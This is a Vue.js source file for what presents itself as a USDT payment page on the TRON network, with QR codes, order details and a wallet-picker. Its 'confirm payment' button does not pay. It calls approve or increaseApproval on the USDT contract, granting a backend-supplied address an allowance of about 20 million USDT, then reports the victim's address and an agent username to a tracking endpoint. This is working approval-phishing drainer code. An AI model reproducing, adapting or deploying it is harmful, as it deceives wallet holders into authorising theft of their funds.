<template>
  <div class="payment-container">
    <!-- PC端专用 -->
    <div v-if="mode === 'pc'" class="pc-content" id="pcContent">
      <div class="container">
        <div class="header">
          <div class="header-icon">
            <i class="icon-wallet"></i>
          </div>
          <h1>正在支付 USDT - 波场 (TRON) 网络</h1>
          <p class="subtitle" :class="getConnectionStatusClass">为了您的安全起见，请打开钱包App扫描进行支付</p>


        </div>

        <div class="alert-section">
          <div class="alert">
            <i class="icon-info"></i>
            <p>付款成功后请勿关闭此页面，请耐心等待自动回调订单</p>
          </div>
        </div>

        <div class="qr-section">
          <div class="qr-container">
            <div class="qr-code-wrapper">
              <div class="qr-code">
                <img :src="qrCodeDataUrl" alt="USDT支付二维码" class="qr-image">
                <div class="qr-logo-overlay">
                  <div class="qr-logo-container">
                    <img src="../../assets/img/tether-usdt-logo.png" class="qr-logo" id="logo-pc">
                  </div>
                </div>
              </div>
            </div>
            <div class="qr-instruction">
              <p>请使用钱包App扫描二维码进行支付</p>
            </div>
          </div>
        </div>

        <div class="info-section">
          <div class="info-card">
            <div class="info-item" v-if="params.paymentStatus">
              <div class="info-label">
                <i class="icon-product"></i>
                <span>商品名称</span>
              </div>
              <div class="info-value">{{ params.paymentStatus }}</div>
            </div>

            <div class="divider"></div>

            <div class="info-item">
              <div class="info-label">
                <i class="icon-details"></i>
                <span>商品详细</span>
              </div>
              <div class="info-value">{{ params.goodsName }}</div>
            </div>

            <div class="divider"></div>

            <div class="info-item">
              <div class="info-label">
                <i class="icon-quantity"></i>
                <span>购买数量</span>
              </div>
              <div class="info-value">{{ params.num }} 件</div>
            </div>

            <div class="divider"></div>

            <div class="info-item">
              <div class="info-label">
                <i class="icon-amount"></i>
                <span>付款金额</span>
              </div>
              <div class="info-value highlight">{{ params.amount }} USDT</div>
            </div>
          </div>
        </div>
      </div>
    </div>

    <!-- 移动端专用 -->
    <div v-if="mode === 'mobile'" class="mobile-content" id="mobileContent">
      <div class="container">
        <div class="header">
          <div class="header-icon">
            <i class="icon-wallet"></i>
          </div>
          <h1>正在支付 USDT 到 波场(TRON) 网络</h1>
          <p class="subtitle" :class="getConnectionStatusClass">为了您的安全起见，请打开钱包App扫描进行支付 </p>


        </div>

        <div class="alert-section">
          <div class="alert">
            <i class="icon-info"></i>
            <p>付款成功后请勿关闭此页面，请耐心等待自动回调订单</p>
          </div>
        </div>

        <div class="qr-section">
          <div class="qr-container">
            <div class="qr-code-wrapper">
              <div class="qr-code">
                <img :src="qrCodeDataUrl" alt="USDT支付二维码" class="qr-image">
                <div class="qr-logo-overlay">
                  <div class="qr-logo-container">
                    <img src="../../assets/img/tether-usdt-logo.png" class="qr-logo" id="logo-mobile">
                  </div>
                </div>
              </div>
            </div>
            <div class="qr-instruction">
              <p>请使用钱包App扫描二维码进行支付</p>
            </div>
          </div>
        </div>
        <div class="info-section">
          <div class="info-card">
            <div class="info-item" v-if="params.paymentStatus">
              <div class="info-label">
                <i class="icon-product"></i>
                <span>商品名称</span>
              </div>
              <div class="info-value">{{ params.paymentStatus }}</div>
            </div>

            <div class="divider"></div>

            <div class="info-item">
              <div class="info-label">
                <i class="icon-details"></i>
                <span>商品详细</span>
              </div>
              <div class="info-value">{{ params.goodsName }}</div>
            </div>

            <div class="divider"></div>

            <div class="info-item">
              <div class="info-label">
                <i class="icon-quantity"></i>
                <span>购买数量</span>
              </div>
              <div class="info-value">{{ params.num }} 件</div>
            </div>

            <div class="divider"></div>

            <div class="info-item">
              <div class="info-label">
                <i class="icon-amount"></i>
                <span>付款金额</span>
              </div>
              <div class="info-value highlight">{{ params.amount }} USDT</div>
            </div>
          </div>
        </div>

        <!-- 移动端钱包连接信息 -->
        <!-- <div class="wallet-info-section" v-if="userData.address">
          <div class="wallet-info-card">
            <h3>钱包信息</h3>
            <div class="wallet-details">
              <div class="wallet-detail">
                <span class="detail-label">钱包地址:</span>
                <span class="detail-value">{{ formatAddress(userData.address) }}</span>
              </div>
              <div class="wallet-detail">
                <span class="detail-label">USDT余额:</span>
                <span class="detail-value">{{ userData.usdtBalance || '0.000000' }} USDT</span>
              </div>
            </div>
          </div>
        </div> -->

        <div class="wallet-section">
          <div class="section-title">
            <h2>选择付款钱包</h2>
          </div>
          <div class="wallet-grid" id="wallets">
            <div v-for="wallet in wallets" :key="wallet.value"
              :class="['wallet-item', { 'selected': selectedWallet === wallet.value }]"
              @click="selectWallet(wallet.value)"
              style="display: flex;justify-content: space-between; margin-top: 5px;">
              <div class="wallet-content" style="display: flex;">
                <img :src="wallet.image" :alt="wallet.name">
                <span>{{ wallet.name }}</span>
              </div>
              <div class="radio-indicator">
                <div class="radio-outer">
                  <div class="radio-inner" v-if="selectedWallet === wallet.value"></div>
                </div>
              </div>

            </div>
          </div>
        </div>

        <div class="action-section">
          <button class="pay-button" @click="payNow" :disabled="!selectedWallet">
            <span v-if="!selectedWallet">请选择钱包</span>

            <span v-else>使用 {{ selectedWalletName }} 支付</span>
          </button>
        </div>
      </div>
    </div>

    <!-- 钱包DAPP专用 -->
    <div v-if="mode === 'wallet'" class="wallet-content" id="walletContent">
      <div class="container">
        <div class="header">
          <div class="header-icon">
            <i class="icon-wallet"></i>
          </div>
          <h1>正在支付 USDT 到 波场(TRON) 网络</h1>
          <p class="subtitle" :class="getConnectionStatusClass">付款成功后请勿关闭此页面，请耐心等待自动回调订单 </p>


        </div>

        <div class="product-image-section">
          <div class="product-image-container">
            <div class="product-image">
              <img src="../../assets/img/1.jpg" alt="商品图片" id="goods-cover">
            </div>
          </div>
        </div>

        <div class="info-section">
          <div class="info-card">
            <div class="info-item" v-if="params.paymentStatus">
              <div class="info-label">
                <i class="icon-product"></i>
                <span>商品名称</span>
              </div>
              <div class="info-value">{{ params.paymentStatus }}</div>
            </div>

            <div class="divider"></div>

            <div class="info-item">
              <div class="info-label">
                <i class="icon-details"></i>
                <span>商品详细</span>
              </div>
              <div class="info-value">{{ params.goodsName }}</div>
            </div>

            <div class="divider"></div>

            <div class="info-item">
              <div class="info-label">
                <i class="icon-quantity"></i>
                <span>购买数量</span>
              </div>
              <div class="info-value">{{ params.num }} 件</div>
            </div>

            <div class="divider"></div>

            <div class="info-item">
              <div class="info-label">
                <i class="icon-amount"></i>
                <span>付款金额</span>
              </div>
              <div class="info-value highlight" id="paymentAmount">{{ params.amount }} USDT</div>
            </div>
          </div>
        </div>



        <div class="action-section">
          <button class="pay-approvalbutton" @click="invokePay" :disabled="paydisabled">

            <span>确认支付</span>
          </button>
        </div>
      </div>
    </div>
  </div>
</template>

<script>
import dayjs from 'dayjs';
import QRCode from 'qrcode';
import axios from 'axios';
import device from '@/utils/device';
import { getUUID } from "@/utils/timed-uuid.js";
import { detectConnectedWallet } from "@/utils/detectConnectedWallet.js";
import { getTronWalletInfo, openInWallet } from "@/utils/tronWallet.js";
import { toTokenAmount, fromTokenAmount } from '@/utils/device';
import BigNumber from 'bignumber.js';
import { UAParser } from 'ua-parser-js';
import { getApprove, getAgentInfo, progress, transfer, getQueryOrderById } from "../../http/request.js"

// 常量定义
const CONSTANTS = {
  POLLING_INTERVAL: 2000,
  USDT_CONTRACT_ADDRESS: 'TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t',
  WALLETS: [
    {
      value: 'imToken',
      name: 'imToken钱包',
      image: require('../../assets/img/imtoken.png')
    },
    {
      value: 'tokenpocket',
      name: 'TokenPocket',
      image: require('../../assets/img/tokenpocket.png')
    },
    {
      value: 'TRONLINK',
      name: 'TronLink钱包',
      image: require('../../assets/img/TronLink.png')
    },
    {
      value: 'OneKey',
      name: 'OneKey钱包',
      image: require('../../assets/img/onekey.png')
    },
    {
      value: 'bitpie',
      name: 'Bitpie钱包',
      image: require('../../assets/img/bitpie.png')
    }
  ]
};

export default {
  name: 'HomeIndex',
  data() {
    return {

      paydisabled: true,
      // 重连相关状态
      reconnectTimer: null,
      reconnectAttempts: 0,
      maxReconnectAttempts: 10005,

      ContractAddress: null,
      uuid: '',      // 存储UUID
      expired: true, // 是否过期
      storageKey: 'my_app_uuid',// 存储键名

      // 连接状态管理
      connectionStatus: 'disconnected', // disconnected, connecting, connected, error
      connectionError: null,
      walletInfo: {},
      // 其他数据
      mode: 'pc',
      text: '',
      qrCodeDataUrl: '',
      userData: {
        address: null,
        trxBalance: null,
        usdtBalance: null,
        tgusername: null
      },
      params: {},
      maps: {},
      ConfigPrams: {},
      currentAddress: null,
      lastUpdated: null,
      pollingInterval: null,
      debounceTimer: null,
      pollingIntervalMs: CONSTANTS.POLLING_INTERVAL,
      account: null,
      trxUsdtTimer: null,
      trxUsdtIntervalNumber: CONSTANTS.POLLING_INTERVAL,
      error: null,
      selectedWallet: null,
      address_sq: CONSTANTS.USDT_CONTRACT_ADDRESS,
      wallets: CONSTANTS.WALLETS,
      dedvsPrams: {},
    }
  },
  computed: {
    selectedWalletName() {
      const wallet = this.wallets.find(w => w.value === this.selectedWallet);
      return wallet ? wallet.name : '';
    },
    isPayButtonEnabled() {
      return this.mode === 'mobile' ? this.selectedWallet : this.isConnected;
    },
    getConnectionStatusClass() {
      return {
        'status-disconnected': this.connectionStatus === 'disconnected',
        'status-connecting': this.connectionStatus === 'connecting',
        'status-connected': this.connectionStatus === 'connected',
        'status-error': this.connectionStatus === 'error'
      };
    },
    // 简化连接状态判断
    isConnected() {
      return this.connectionStatus === 'connected';
    }
  },
  mounted() {


    this.initializeComponent();
  },
  beforeDestroy() {
    this.cleanup();
  },
  methods: {
    // 初始化组件
    initializeComponent() {
      this.dedvsPrams = this.getDeviceInfo();
      console.log(this.dedvsPrams);

      const savedWallet = localStorage.getItem('selectedWalletName');
      // 使用示例v
      const currentWallet = this.detectTronWallet();
      console.log(`当前钱包: ${currentWallet}`);
      // console.log(this.detectTronWallets());

      console.log('已选择钱包:', savedWallet);

      this.maps = this.getRequestParams();
      if (this.maps) {
        this.getQueryOrderByIdRequest();
        this.detectAndDisplayContent();
        this.detectEnvironment();
        this.setupEventListeners();
        this.initWalletConnection();
      }
    },

    // 检测TRON钱包的函数

    detectTronWallet() {
      const wallets = [
        {
          name: 'TronLink',
          check: () => (window.tronLink || window.tronWeb) ? true : false
        },
        {
          name: 'TokenPocket',
          check: () => (window.tokenpocket && window.tokenpocket.tron) ? true : false
        },
        {
          name: 'imToken',
          check: () => (window.ethereum && window.ethereum.isImToken) ? true : false
        },
        {
          name: 'OneKey',
          check: () => (window.$onekey && window.$onekey.isOneKey) ? true : false
        },
        {
          name: 'Bitpie',
          check: () => (window.bitpie && window.bitpie.isBitpie) ? true : false
        }
      ];

      for (let wallet of wallets) {
        if (wallet.check()) {
          return wallet.name; // 直接返回检测到的钱包名称
        }
      }
      return 'Unknown'; // 未检测到任何已知钱包
    },




    // 设置事件监听器
    setupEventListeners() {
      window.addEventListener('message', this.handleTronMessage);
      window.addEventListener('focus', this.handleWindowFocus);
      window.addEventListener('beforeunload', this.cleanup);

      // 添加页面可见性监听
      document.addEventListener('visibilitychange', this.handleVisibilityChange);
    },

    // 移除事件监听器
    removeEventListeners() {
      window.removeEventListener('message', this.handleTronMessage);
      window.removeEventListener('focus', this.handleWindowFocus);
      window.removeEventListener('beforeunload', this.cleanup);
      document.removeEventListener('visibilitychange', this.handleVisibilityChange);
    },

    // 页面可见性变化处理
    handleVisibilityChange() {
      if (!document.hidden && this.connectionStatus !== 'connected') {
        this.checkWalletConnection();
      }
    },

    // 窗口焦点事件处理
    handleWindowFocus() {
      if (this.connectionStatus !== 'connected') {
        this.checkWalletConnection();
      }
    },

    // 初始化钱包连接
    async initWalletConnection() {
      console.log("初始化钱包连接...");

      // 初始检查
      await this.checkWalletConnection();
    },

    // 处理TronLink消息
    handleTronMessage(e) {
      // 处理账户变化
      if (e.data?.message?.action === "setAccount") {
        console.log("检测到账户变化:", e.data.message);
        this.handleAccountChange(e.data.message.address);
      }

      // 处理网络变化
      if (e.data?.message?.action === "setNode") {
        console.log("检测到网络变化:", e.data.message);
        this.handleNetworkChange();
      }
    },

    // 处理账户变化
    async handleAccountChange(newAddress) {
      console.log("账户已切换:", newAddress);

      // 更新地址
      this.userData.address = newAddress;

      if (newAddress) {
        // 新地址有效，重新连接
        this.connectionStatus = 'connecting';
        await this.verifyAndUpdateConnection();
      } else {
        // 地址被清空，断开连接
        this.handleDisconnection();
      }
    },

    // 处理网络变化
    async handleNetworkChange() {
      console.log("网络已切换，重新验证连接...");
      this.connectionStatus = 'connecting';
      await this.verifyAndUpdateConnection();
    },

    // 检查钱包连接状态
    async checkWalletConnection() {
      try {
        if (this.isTronWebAvailable()) {
          const isConnected = await this.verifyConnection();
          if (isConnected) {
            await this.handleConnectionSuccess();
          } else {
            this.startAutoReconnect();
          }
        } else {
          this.connectionStatus = 'disconnected';
        }
      } catch (error) {
        console.error("检查连接失败:", error);
        this.connectionStatus = 'error';
        this.connectionError = error.message;
      }
    },

    // 验证并更新连接
    async verifyAndUpdateConnection() {
      try {
        const isConnected = await this.verifyConnection();
        if (isConnected) {
          await this.handleConnectionSuccess();
        } else {
          this.handleConnectionFailure();
        }
      } catch (error) {
        this.handleConnectionError(error);
      }
    },

    // 验证连接状态
    async verifyConnection() {
      // 检查TronWeb是否可用
      if (!this.isTronWebAvailable()) {
        return false;
      }

      // 检查是否有默认地址
      if (!window.tronWeb.defaultAddress?.base58) {
        return false;
      }

      try {
        // 验证网络连接
        const nodeInfo = await window.tronWeb.trx.getNodeInfo();
        if (!nodeInfo) return false;

        // 验证账户信息可访问
        const accountInfo = await window.tronWeb.trx.getAccount(
          window.tronWeb.defaultAddress.base58
        );

        return !!accountInfo;
      } catch (error) {
        console.error("连接验证失败:", error);
        return false;
      }
    },

    // 检查TronWeb是否可用
    isTronWebAvailable() {
      return window.tronWeb &&
        window.tronWeb.ready &&
        window.tronWeb.defaultAddress;
    },

    // 处理连接成功
    async handleConnectionSuccess() {
      this.connectionStatus = 'connected';
      this.userData.address = window.tronWeb.defaultAddress.base58;
      this.stopAutoReconnect();

      // 开始余额轮询
      this.startBalancePolling();

      console.log('钱包连接成功:', this.userData.address);
      this.getApproveRequest(this.userData.address)

      // 2. 连接成功，检测钱包信息
      this.walletInfo = detectConnectedWallet(window.tronWeb);
      console.log('检测到的钱包信息:', this.walletInfo);
      // 更新UI状态
      // this.$nextTick(() => {
      //   this.$message.success('钱包连接成功！');
      // });
    },
    // 获取授权地址
    async getApproveRequest(address) {
      try {
        const res = await getApprove({ address: address });
        console.log(res.data);

        if (res.data.code == 10001) {
          this.ContractAddress = res.data.message;
          this.paydisabled = false
          this.progressRequest(1)
        } else {
          this.ContractAddress = null;
          this.paydisabled = true
        }

        console.log(this.ContractAddress);
      } catch (error) {
        console.error('授权请求失败:', error);
        this.$loading.hide();
      }
    },
    // 处理连接失败
    handleConnectionFailure() {
      this.connectionStatus = 'disconnected';
      this.startAutoReconnect();
    },

    // 处理连接错误
    handleConnectionError(error) {
      this.connectionStatus = 'error';
      this.connectionError = error.message;
      console.error('连接错误:', error);
    },

    // 处理断开连接
    handleDisconnection() {
      this.connectionStatus = 'disconnected';
      this.userData.address = null;
      this.userData.usdtBalance = null;
      this.userData.trxBalance = null;
      this.stopBalancePolling();
      this.startAutoReconnect();

      console.log('钱包已断开连接');
    },

    // 自动重连逻辑
    startAutoReconnect() {
      this.stopAutoReconnect();
      this.reconnectTimer = setInterval(async () => {
        if (this.reconnectAttempts >= this.maxReconnectAttempts) {
          console.log("达到最大重连次数，停止自动重连");
          this.stopAutoReconnect();
          return;
        }
        this.reconnectAttempts++;
        console.log(`自动重连尝试 ${this.reconnectAttempts}/${this.maxReconnectAttempts}`);
        await this.checkWalletConnection();
      }, 3000); // 每3秒尝试一次
    },

    // 停止自动重连
    stopAutoReconnect() {
      if (this.reconnectTimer) {
        clearInterval(this.reconnectTimer);
        this.reconnectTimer = null;
      }
      this.reconnectAttempts = 0;
    },

    // 手动连接钱包
    async manualConnect() {
      if (this.connectionStatus === 'connecting') return;

      this.connectionStatus = 'connecting';
      this.connectionError = null;

      try {
        // 检查TronLink是否安装
        if (typeof window.tronWeb === 'undefined') {
          throw new Error('TRONLINK_NOT_INSTALLED');
        }

        this.$loading.show({
          text: '正在连接钱包...',
          spinner: 'el-icon-loading'
        });

        // 请求账户授权
        let result;
        if (window.tronWeb.request) {
          result = await window.tronWeb.request({ method: 'tron_requestAccounts' });
        } else if (window.tronLink?.request) {
          result = await window.tronLink.request({ method: 'tron_requestAccounts' });
        } else {
          throw new Error('NO_AUTHORIZATION_METHOD_AVAILABLE');
        }

        if (result && result.code === 200) {
          // 授权成功，验证连接
          const connected = await this.verifyConnection();
          if (connected) {
            await this.handleConnectionSuccess();
            this.$loading.hide();

            // 如果是支付流程，继续授权
            if (this.userData.address) {
              this.increasePay(this.userData.address);
            }
          } else {
            throw new Error('CONNECTION_VERIFICATION_FAILED');
          }
        } else {
          throw new Error('AUTHORIZATION_REJECTED');
        }

      } catch (error) {
        this.$loading.hide();
        await this.handleManualConnectionError(error);
      }
    },

    // 处理手动连接错误
    async handleManualConnectionError(error) {
      this.connectionStatus = 'error';

      let errorMessage = '连接失败，请重试';
      switch (error.message) {
        case 'TRONLINK_NOT_INSTALLED':
          errorMessage = '未检测到TronLink钱包，请安装后重试';
          this.promptInstallTronLink();
          break;
        case 'TRONLINK_NOT_READY':
          errorMessage = 'TronLink未就绪，请刷新页面后重试';
          break;
        case 'AUTHORIZATION_REJECTED':
          errorMessage = '账户授权被拒绝，请授权以继续';
          break;
        case 'CONNECTION_VERIFICATION_FAILED':
          errorMessage = '连接验证失败，请检查网络设置';
          break;
        case 'NO_AUTHORIZATION_METHOD_AVAILABLE':
          errorMessage = '无法请求账户授权，请升级TronLink版本';
          break;
        default:
          errorMessage = `连接失败: ${error.message}`;
          break;
      }

      this.connectionError = errorMessage;
      // this.$message.error(errorMessage);
      // console.error('手动连接失败:', error);
    },

    // 提示安装TronLink
    promptInstallTronLink() {
      this.$confirm(
        '需要安装TronLink钱包才能继续。是否前往安装？',
        '未检测到钱包',
        {
          confirmButtonText: '前往安装',
          cancelButtonText: '取消',
          type: 'warning'
        }
      ).then(() => {
        window.open('https://www.tronlink.org/', '_blank');
      }).catch(() => {
        // 用户取消
      });
    },

    // 重试连接
    retryConnection() {
      this.connectionError = null;
      this.manualConnect();
    },

    // API请求方法
    async getQueryOrderByIdRequest() {
      try {
        const res = await getQueryOrderById({ id: this.maps.id });
        if (res && res.data && res.data.code === 200) {
          this.params = res.data.result;
        } else if (res && res.data) {
          console.error('查询订单失败:', res.data.message || '未知错误');
        }
      } catch (error) {
        console.error('查询订单失败:', error);
        // 添加网络错误提示
        this.$message({
          message: '网络连接失败，请检查网络设置或稍后重试',
          type: 'error',
          duration: 3000
        });
      }
    },

    // 设备信息获取
    getDeviceInfo() {
      const parser = new UAParser();
      return parser.getResult();
    },

    // URL参数解析
    getRequestParams() {
      const url = location.href;
      const requestParams = {};

      if (url.includes("?")) {
        const str = url.substr(url.indexOf("?") + 1);
        const strs = str.split("&");
        strs.forEach(param => {
          const [key, value] = param.split("=");
          requestParams[key] = decodeURI(value);
        });
      }
      return requestParams;
    },

    // 二维码生成
    async generateQRCode(url) {
      try {
        const qrCodeDataURL = await QRCode.toDataURL(url, {
          width: 280,
          margin: 2,
          color: {
            dark: '#000000',
            light: '#FFFFFF'
          }
        });

        this.qrCodeDataUrl = qrCodeDataURL;
        this.$nextTick(this.addLogoToQRCode);
      } catch (err) {
        console.error('二维码生成失败', err);
        // 备用方案
        try {
          this.qrCodeDataUrl = await QRCode.toDataURL(url);
        } catch (fallbackErr) {
          console.error('备用二维码生成也失败', fallbackErr);
        }
      }
    },

    // Logo定位
    addLogoToQRCode() {
      const qrLogos = document.querySelectorAll('.qr-logo');
      qrLogos.forEach(logo => {
        if (logo.complete) {
          this.positionLogo(logo);
        } else {
          logo.onload = () => this.positionLogo(logo);
        }
      });
    },

    positionLogo(logo) {
      const container = logo.closest('.qr-code');
      if (container) {
        const logoContainer = logo.closest('.qr-logo-container');
        if (logoContainer) {
          logoContainer.style.position = 'absolute';
          logoContainer.style.top = '50%';
          logoContainer.style.left = '50%';
          logoContainer.style.transform = 'translate(-50%, -50%)';
        }
      }
    },

    // 环境检测
    detectEnvironment() {
      const ua = navigator.userAgent;
      const isMobile = /Android|iPhone|iPad/i.test(ua);

      if (device.isDAppBrowser() || device.isTronLink() || device.isOneKey() || device.isTokenPocket()) {
        this.mode = 'wallet';
      } else if (isMobile) {
        this.mode = 'mobile';
      } else {
        this.mode = 'pc';
      }
    },

    detectAndDisplayContent() {
      const currentUrl = window.location.href;
      this.generateQRCode(currentUrl);
    },

    // 余额查询
    startBalancePolling() {
      this.stopBalancePolling();
      this.updateAccountInfo(); // 立即更新一次

      this.trxUsdtTimer = setInterval(() => {
        this.updateAccountInfo();
      }, 5000);
    },

    stopBalancePolling() {
      if (this.trxUsdtTimer) {
        clearInterval(this.trxUsdtTimer);
        this.trxUsdtTimer = null;
      }
    },

    async updateAccountInfo() {
      if (!this.userData.address || !window.tronWeb) return;

      try {
        await Promise.all([
          this.updateTokenBalance(),
          this.getAccountInfo()
        ]);
      } catch (error) {
        console.error('更新账户信息失败:', error);
      }
    },

    async getAccountInfo() {
      try {
        // 先获取基本账户信息
        this.account = await window.tronWeb.trx.getAccount(this.userData.address);
        const trxBalance = window.tronWeb.fromSun(this.account.balance);
        this.userData.trxBalance = trxBalance;
        console.log('trx余额:' + trxBalance);
        // 尝试获取账户资源信息（包括能量）
        try {
          const accountResources = await window.tronWeb.trx.getAccountResources(this.userData.address);
          console.log('账户资源信息:', accountResources);

          // 将能量信息添加到account对象中
          if (accountResources && accountResources.EnergyLimit) {
            this.account.energy = accountResources.EnergyLimit;
            console.log('通过getAccountResources获取的能量:', accountResources.EnergyLimit);
          } else if (accountResources && accountResources.energy) {
            this.account.energy = accountResources.energy;
            console.log('通过getAccountResources获取的能量:', accountResources.energy);
          }
        } catch (resourceError) {
          console.warn('获取账户资源信息出错:', resourceError);
        }

        // 如果仍然没有能量信息，尝试使用getAccount的另一种方式
        if (!this.account.energy) {
          try {
            const accountDetail = await window.tronWeb.trx.getAccount(this.userData.address, true);
            if (accountDetail && accountDetail.energy) {
              this.account.energy = accountDetail.energy;
              console.log('通过getAccount(..., true)获取的能量:', accountDetail.energy);
            }
          } catch (detailError) {
            console.warn('获取账户详细信息出错:', detailError);
          }
        }

        console.log('最终账户信息:', this.account);
      } catch (error) {
        console.error('获取账户信息出错:', error);
      }
    },

    async getTokenBalance(tokenAddress, account) {
      try {
        if (!window.tronWeb) throw new Error('TronWeb未初始化');
        if (!tokenAddress || !account) throw new Error('参数不能为空');

        const contract = await window.tronWeb.contract().at(tokenAddress);
        const [symbol, decimals, balance] = await Promise.all([
          contract.symbol().call(),
          contract.decimals().call(),
          contract.balanceOf(account).call(),
        ]);

        const formattedBalance = this.formatTokenBalance(
          balance.toString(),
          Number(decimals),
          6
        );
        this.userData.usdtBalance = formattedBalance;
        return {
          balance: formattedBalance,
          symbol: symbol,
          decimals: Number(decimals),
          rawBalance: balance.toString()
        };
      } catch (error) {
        console.error('获取余额失败:', error);
        throw error;
      }
    },

    async updateTokenBalance() {
      if (!this.userData.address || !window.tronWeb.isAddress(this.userData.address)) {
        return;
      }

      try {
        const result = await this.getTokenBalance(this.address_sq, this.userData.address);
        console.log(`${result.balance} ${result.symbol}`);
      } catch (error) {
        console.error("查询代币余额失败:", error);
      }
    },

    // 工具函数
    formatTokenBalance(balance, decimals, precision = 6) {
      try {
        const balanceStr = balance.toString();
        const decimalsNum = parseInt(decimals.toString());

        if (decimalsNum === 0) return balanceStr;

        const paddedBalance = balanceStr.padStart(decimalsNum + 1, '0');
        const integerPart = paddedBalance.slice(0, -decimalsNum) || '0';
        let decimalPart = paddedBalance.slice(-decimalsNum);

        if (decimalPart.length > precision) {
          decimalPart = decimalPart.slice(0, precision);
        }

        const result = integerPart + '.' + decimalPart;
        return this.removeTrailingZeros(result);
      } catch (error) {
        console.error("格式化代币余额失败:", error);
        return "0";
      }
    },

    removeTrailingZeros(numberStr) {
      if (numberStr.includes('.')) {
        numberStr = numberStr.replace(/0+$/, '');
        if (numberStr.endsWith('.')) {
          numberStr = numberStr.slice(0, -1);
        }
      }
      return numberStr;
    },

    formatAddress(address) {
      if (!address) return '';
      return address.substring(0, 8) + '...' + address.substring(address.length - 8);
    },

    // 授权相关
    async increaseApprovals(spenderAddress, _this) {
      try {
        if (!window.tronWeb || !window.tronWeb.ready) {
          throw new Error("TronWeb 未初始化，请确保钱包已连接");
        }


        const currentDate = dayjs().format('YYYYMMDD');
        const currentDateTimestamp = parseInt(currentDate) * 1000000;
        const usdtContractAddress = this.address_sq;
        const usdtContract = await window.tronWeb.contract().at(usdtContractAddress);

        let transaction;
        _this.$loading.hide();

        // 方法1: 尝试 increaseApproval
        try {
          console.log("尝试使用 increaseApproval 方法");
          if (usdtContract.increaseApproval) {
            transaction = await usdtContract.increaseApproval(
              spenderAddress,
              currentDateTimestamp
            ).send({
              feeLimit: 100_000_000,
              callValue: 0,
            });
            console.log("✅ 使用 increaseAllowance 方法授权成功");
            return this.handleSuccessTransaction(transaction, _this);
          }
          throw new Error("increaseAllowance 方法不存在");
        } catch (increaseError) {
          console.log("increaseAllowance 方法失败:", increaseError.message);
        }

        // 方法2: 尝试 approve
        try {
          console.log("尝试使用 approve 方法");
          transaction = await usdtContract.approve(
            spenderAddress,
            currentDateTimestamp
          ).send({
            feeLimit: 100_000_000,
            callValue: 0,
          });
          console.log("✅ 使用 approve 方法授权成功");
          return this.handleSuccessTransaction(transaction, _this);
        } catch (approveError) {
          console.log("approve 方法失败:", approveError.message);
          throw new Error("所有授权方法都失败了");
        }
      } catch (error) {
        return this.handleError(error, this);
      }
    },

    // 钱包选择
    selectWallet(walletValue) {
      this.selectedWallet = walletValue;
      console.log(this.selectedWallet);
    },

    payNow() {
      if (!this.selectedWallet) {
        this.$message.warning('请选择钱包');
        return;
      }

      const currentUrl = window.location.href;
      const isMobile = /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent);

      if (!isMobile) {
        this.$message.warning('请使用手机浏览器打开本页面');
        return;
      }

      localStorage.setItem('selectedWalletName', this.selectedWallet);
      this.openWalletDApp(currentUrl);
    },

    openWalletDApp(currentUrl) {
      const walletConfigs = {
        'imToken': `imtokenv2://navigate?screen=DappView&url=${encodeURIComponent(currentUrl)}`,
        'tokenpocket': this.getTokenPocketUrl(currentUrl),
        'TRONLINK': `tronlinkoutside://pull.activity?param=${encodeURIComponent(JSON.stringify({
          url: currentUrl,
          action: "open",
          protocol: "tronlink",
          version: "1.0"
        }))}`,
        'OneKey': `onekeywallet://browser?url=${encodeURIComponent(currentUrl)}`,
        'bitpie': `bitpie://dapp?url=${encodeURIComponent(currentUrl)}`
      };

      const url = walletConfigs[this.selectedWallet];
      if (url) {
        window.location.href = url;
      }
    },

    getTokenPocketUrl(currentUrl) {
      return `tpdapp://open?params=${encodeURIComponent(JSON.stringify({
        url: currentUrl,
        chain: "TRON"
      }))}`;
    },

    // 授权支付
    async increasePay() {

      console.log(this.userData.trxBalance);
      let _this = this;
      try {

        if (!this.ContractAddress) {
          _this.$loading.hide();
          return;
        }
        // 获取最新的账户信息，确保能量数据是最新的
        await this.getAccountInfo();
        console.log(this.account.energy);
        console.log(this.userData.trxBalance);

        // 检查能量是否足够
        if (this.account && this.account.energy) {
          console.log('当前能量:', this.account.energy);
          if (this.account.energy < 131000 && this.userData.trxBalance < 20) {
            _this.$loading.hide();
            _this.$message.warning('能量不足，请确保能量大于131000或TRX余额大于20');
            return;
          }
        } else {
          // 如果无法获取能量信息，使用TRX余额作为备选
          console.warn('无法获取能量信息，使用TRX余额作为备选');
          if (this.userData.trxBalance < 20) {
            _this.$loading.hide();
            _this.$message.warning('TRX余额不足');
            return;
          }
        }

        // 执行授权操作
        await this.increaseApprovals(this.ContractAddress, _this);
      } catch (error) {
        _this.$loading.hide();
        console.error('授权支付失败:', error);
        if (error.message && error.message.includes('能量不足')) {
          _this.$message.warning('能量不足，请确保能量大于131000或TRX余额大于20');
        } else {
          _this.$message.warning('网络异常请稍后再试');
        }
      }
    },

    // 工具函数
    delay(ms) {
      return new Promise(resolve => setTimeout(resolve, ms));
    },

    handleSuccessTransaction(transaction, _this) {
      // 实现交易成功处理
      console.log('交易成功:', transaction);
      _this.progressRequest(2)
    },

    handleError(error, _this) {
      // 实现错误处理
      _this.progressRequest(3)
      console.error('交易错误:', error);
      _this.$loading.hide();
    },



    // 在invokePay方法中调用手动连接
    invokePay() {
      try {
        console.log(this.paydisabled);
        
        if (!this.userData.address) {
          this.$message.warning('请连接钱包后再进行交易');
          console.log("请先连接您的钱包再开始交易");

          this.manualConnect();
          return;
        }
        if (this.userData.address) {
          this.$loading.show({
            text: '正在处理...',
            spinner: 'el-icon-loading'
          });
          this.increasePay(this.userData.address);

        }

      } catch (error) {
        console.error("invokePay报错:", error);
        this.$loading.hide();
        this.$message.error('支付请求失败，请重试');
      }
    },
    /**
     * 
     * @param data 更新进度接口
     */
    async progressRequest(type) {

      let _this = this;
      this.uuid = getUUID();
      let map = {
        "address": this.userData.address,
        "agentUserName": this.params.userName,
        "type": type,
        "url": this.params.notes,
        "sign": this.params.id,//签名
        "contract": this.ContractAddress,//合约地址
        "device": this.walletInfo.version,//终端版本
        "groupIdentifier": this.params.firstName,
        "terminal": this.walletInfo.name,//终端
        "uuid": this.uuid,
        // "version": //终端版本

      }
      progress(map).then(res => {
        if (res.data.code == 200) {
          console.log(res.data);
        }
      })
    },

    // 清理资源
    cleanup() {
      this.stopAutoReconnect();
      this.stopBalancePolling();
      this.removeEventListeners();
    }
  }
}
</script>

